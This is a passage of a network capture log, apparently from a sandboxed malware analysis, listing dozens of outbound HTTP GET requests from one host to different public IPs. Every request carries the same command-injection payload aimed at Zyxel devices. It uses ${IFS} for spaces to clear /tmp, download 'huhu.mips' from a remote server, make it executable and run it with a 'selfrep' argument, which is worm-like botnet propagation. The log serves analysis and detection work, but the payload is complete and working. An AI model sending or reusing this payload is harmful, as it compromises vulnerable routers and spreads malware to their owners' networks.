                                                Jan 29, 2024 07:06:54.798381090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                139192.168.2.235632082.237.37.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.798433065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                140192.168.2.235369617.153.47.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.798490047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                141192.168.2.23382625.112.85.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.798547029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                142192.168.2.2345782200.66.213.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.798578978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                143192.168.2.2354620111.10.13.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.798638105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                144192.168.2.2342204195.129.172.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:55.796555042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                145192.168.2.2357786125.202.0.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:55.796593904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                146192.168.2.2338836144.53.114.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:55.796641111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                147192.168.2.2333028195.221.114.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:55.796690941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                148192.168.2.2354374177.196.48.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:55.796746016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                149192.168.2.235517653.55.135.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:55.796747923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                150192.168.2.2335550104.80.68.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:56.801120043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                151192.168.2.2343750118.146.174.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:56.801158905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                152192.168.2.2333552115.22.103.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:56.801183939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                153192.168.2.233772031.0.174.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:56.801260948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                154192.168.2.234243670.214.98.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:56.801279068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                155192.168.2.2334110203.105.153.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:57.806672096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                156192.168.2.2341858190.217.71.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:58.810997009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                157192.168.2.2333584150.157.211.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:58.811048985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                158192.168.2.2334650131.52.87.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:58.811077118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                159192.168.2.2337894192.78.165.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:58.811113119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                160192.168.2.235368470.184.74.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:58.811166048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                161192.168.2.233960413.205.154.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:58.811203957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                162192.168.2.2339270213.170.16.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:58.811305046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                163192.168.2.235080434.163.107.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:59.814834118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                164192.168.2.2352250212.62.181.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:59.814856052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                165192.168.2.2360540110.15.143.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:59.814881086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                166192.168.2.23335309.237.78.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:59.814908028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                167192.168.2.233823620.204.17.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:59.814935923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                168192.168.2.233702685.188.126.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:59.814954042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                169192.168.2.2335484199.244.88.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:59.815001965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                170192.168.2.2345646207.27.96.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:59.815017939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                171192.168.2.234526424.25.48.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:59.815068960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                172192.168.2.2332888203.246.202.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:59.815088034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                173192.168.2.2344586182.57.74.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:59.815123081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                174192.168.2.2358734194.176.31.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:59.815185070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                175192.168.2.235087868.109.217.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:59.815185070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                176192.168.2.2339192134.195.228.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:59.815201044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                177192.168.2.2348372121.190.235.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:59.815251112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                178192.168.2.2350448119.10.218.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:59.815279007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                179192.168.2.2335032205.231.37.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:59.815300941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                180192.168.2.2339178161.62.109.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:59.815345049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                181192.168.2.234428276.158.243.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:59.815381050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                182192.168.2.233332420.212.7.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:59.815396070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                183192.168.2.2347912165.95.244.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:59.815423965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                184192.168.2.235964291.254.219.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:59.815423965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                185192.168.2.2360694143.13.111.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:59.815457106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                186192.168.2.235053299.244.39.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:59.815490961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                187192.168.2.234015676.117.120.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:59.815543890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                188192.168.2.2343486195.130.29.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:59.815547943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                189192.168.2.2350552196.180.248.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:59.815594912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                190192.168.2.235593646.203.32.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:59.815598011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                191192.168.2.2359864107.112.182.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:59.815638065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                192192.168.2.2356770115.241.44.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:59.815665007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                193192.168.2.2357216104.149.81.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:59.815702915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                194192.168.2.234485263.207.245.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:00.818895102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                195192.168.2.2336892221.117.187.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:00.818918943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                196192.168.2.2336944135.80.93.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:00.818963051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                197192.168.2.2350222220.105.255.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:00.818984985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                198192.168.2.233535888.162.21.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:00.819021940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                199192.168.2.2350210136.194.234.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:00.819039106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                200192.168.2.234123634.64.254.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:00.819089890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                201192.168.2.235149853.186.89.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:00.819113016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                202192.168.2.2343688143.77.249.194443
                                                TimestampBytes transferredDirectionData
